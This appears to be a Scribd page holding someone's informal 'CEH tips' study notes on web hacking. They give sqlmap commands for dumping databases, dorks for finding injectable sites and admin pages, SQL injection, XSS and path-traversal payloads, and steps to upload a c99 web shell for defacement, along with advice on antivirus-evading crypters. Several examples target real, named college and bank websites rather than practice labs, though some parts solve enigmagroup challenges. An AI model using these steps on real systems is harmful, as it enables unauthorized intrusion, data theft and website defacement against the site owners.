Scribd Logo
Unggah

Selamat datang di Scribd!

  • CEH2

    Diunggah oleh

    Parvez Ghadialy
    2K tayangan5 halaman
    CEH tips

    Hak Cipta

    © © All Rights Reserved

    Format Tersedia

    TXT, PDF, TXT atau baca online dari Scribd

    Apakah menurut Anda dokumen ini bermanfaat?

    Apakah konten ini tidak pantas?

    Laporkan Dokumen Ini
    CEH tips

    Hak Cipta:

    © All Rights Reserved
    Unduh sebagai TXT, PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    2K tayangan5 halaman

    CEH2

    Diunggah oleh

    Parvez Ghadialy
    CEH tips

    Hak Cipta:

    © All Rights Reserved
    Unduh sebagai TXT, PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    dari 5

    NOTE: thisislegal.

    com for tuts


    NOTE: kfsensor: honeypot
    NOTE: Snort: IDS
    cd /pentest/database/sqlmap
    ./sqlmap.py -u <path of website with .php?id=156'>
    "-u is for url is specified"
    ./sqlmap.py -u <path of website with .php?id=156'> --dbs

    NOTE: inurl:php?=site:<website name ex: edu.in or xyz.com>


    NOTE: add .php?id=156%27 after a website name.
    ./sqlmap.py -u <path of website with .php?id=156'> -D <database> --tables
    ./sqlmap.py -u <path of website with .php?id=156'> -D <database> -T <tablename>
    --columns
    ./sqlmap.py -u <path of website with .php?id=156'> -D <database> -T <tablename>
    -C <column names1,col nam2.....> --dump
    1) Adding text to the end of the URL
    www.website.com/admin
    www.website.com/administrator
    www.website.com/login
    www.website.com/wp-login.php : only for word press
    www.website.com/admin.php
    2) Exploit the robots.txt

    www.website.com/robots.txt
    3) Google dorks searching

    site:website.com login (you can change the keyword to admin, administrator or some
    thing similar)
    site:website.com inurl:login (same implies here)
    site:website.com intitle: admin login (same implies here with the keywords)
    ex: edu inurl:login
    4) Using the Yashar shahinzadeh admin page finder
    http://y-shahinzadeh.ir/af
    5) Using the Havij Tool

    SARANG's ECSA:
    1) Explore source code for files and directory paths, comments, etc..
    2) Use robots.txt for exploring directory listing.

    Check SQL injection vulnerability:


    <url>' : uirl with single quote
    <url>.php?mode=28&id=28(keep manipulating this value pos and neg )
    sql injection cheat sheet
    enigmagroup.org
    NOTE: google dork: inurl:.php?id= site:moderncoe.edu.in
    ex: http://moderncoe.edu.in/library-page.php?page=1
    http://moderncoe.edu.in/research.php?id=156 order by 1-(shows at least one row is there in database connected if no error)
    http://moderncoe.edu.in/research.php?id=156 order by 2-(shows at least one row is there in database connected if no error)
    NOTE: use login finder tool to find admin login page of a url
    NOTE: watch video sqli defacement part 1 and 2
    keep doing till error comes.
    Then
    http://moderncoe.edu.in/research.php?id=156 union all select 1,2,3......--(total
    num of cols that did not show error . note the -- after the query(-- means comm
    ent))
    NOTE: OWASP MANTRA(web app vul test browser)
    NOTE: angry ip scanner
    Add features: all of them fo all results.
    Preferences: display in results: alive hosts
    ex ip add: 162.222.225.1-.254 /24
    Right click on an entry-> OPEN->....
    ex: web browser of http://162.222.225.33/
    view source code and observe
    plugins/pwpassword/pwpassword.js for forgot password.
    Javascript 001 Intercept http data...
    firefox: install firebug
    Inspect "login" button using firebug. And modify sent value for a give display v
    alue:
    Display value: Jack;
    Sent value: Jane
    Javas=cript 002:
    Enter wrong password:
    Right click on try again and inspect in firebug.
    Now click try again to view run time script.
    Password is there in the "if"condition : skriptkid
    javascript003: script is hidden. Hence explore HTML <body>
    for password. Sauc3
    javascript 004: same as 002
    javascript 005: Password is mention in HEX. Use asciitohex.com to get ASCII pass
    word

    javascript 006: same as above...


    jjavascript 007: J_o_i_n_s_I_t
    http://cryptocult.wordpress.com/cyber-challenges/enigma-group-solutions/javascri
    pt-exploits/
    samair.ru/proxy/ : anonymous proxy ip.
    http://hidemyass.com/proxy-list/
    Tamper data addon from live runtime HTTP header mod on the fly
    hi' or 1=1-- : fake password....
    http://cryptocult.wordpress.com/cyber-challenges/enigma-group-solutions/sql-inje
    ction/
    IJKRhjwB_212vfUKyhnHe8k0
    password decrypt using
    md5 decoder
    base64(contains =)
    crack station
    http://www.md5decrypter.co.uk/
    NOTE: exploitdatabase
    jboss server hacks : use /status after url
    zenmap: net scan
    owasp dirvuster: scnas all folders associated with a website
    my3gb.com:
    <url>/user_index.jsp
    ex: ftp://ftp.hq.nasa.gov/

    : ftp download of nasa

    use c99 shell for website defacement.


    1)
    2)
    3)
    4)
    5)
    6)
    7)
    8)
    We
    9)

    register on my3gb.com and login


    file manager : upload a sample image file
    also upload c99.php. If not allowed, upload using jpeg binder
    click on the c99.php and get the file url.
    logout.
    go to the file url in step 4
    even though u r logged out, u can access the root of server.
    check by deleting a jpeg file. Note, we r logged out.
    can also add files.
    relogin and check the changes are reflecting

    search for hacks by p777i


    serach for fud crypter: fully undetectable
    check ur hack with online antivirus (total antivirus)
    audit disciovery 1
    http://www.enigmagroup.org/missions/basics/auditing/1/index.php/%22%3E%3Cscript%
    3Ealert%28%271%27%29%3C/script%3E
    >"<script>alert(1)</script>

    https://www.owasp.org/index.php/Testing_for_Cross_site_scripting
    audit discovery 4
    http://www.enigmagroup.org/missions/basics/auditing/4/?page=../../../../../../..
    /../../../google.com
    (LFI works but RFI does not)
    http://www.enigmagroup.org/missions/basics/auditing/4/?page=../../../../../../..
    /../../../http://google.com
    audit disc 5
    http://www.enigmagroup.org/missions/basics/auditing/5/?file=config.php
    audit discf 6: see command injection in url
    realistic 1:
    nmap reveals it is linux based as using 8080: apache server.
    hence:
    http://www.enigmagroup.org/missions/realistics/1/?page=../../../../../../../../.
    ./../../../../../../etc/passwd
    buffer overflow to reveal passwd file.
    http://www.enigmagroup.org:1337/ as nmap reveals it is a waste port..may be cust
    oimized for login so exploit it.
    use john the ripper to reveal passwords.

    Monday: OWASP top 10 vuls.


    maltego, hyena
    the dude, lan surveyor
    webgoat : web appl framework simulation
    acunetix, nessus

    webgoat insecure login example:


    (check bankgaborone.co.bw : view page source code, goto href , find fileadmin..
    .... and then go to bankgaborone.co.bw/fileadmin or similar dirs )
    bothocollege: inspect element forogot password using firefox: reveals form_user
    also use burp suit to intercept(enable proxy in firefox using owasp tools-> fire
    proxy)
    modern college
    beef web vul exploit

    DOM(Document Object model) based XSS vul : DOM xss scanner online tool
    Xss vul ex.
    Instead of
    http://scmhrd.edu/eventgallery.php?eventyear=2013&eventname=Prayatna
    write this:
    http://scmhrd.edu/eventgallery.php?eventyear=2013&eventname=<script>alert("Hello
    ")</script>

    Anda mungkin juga menyukai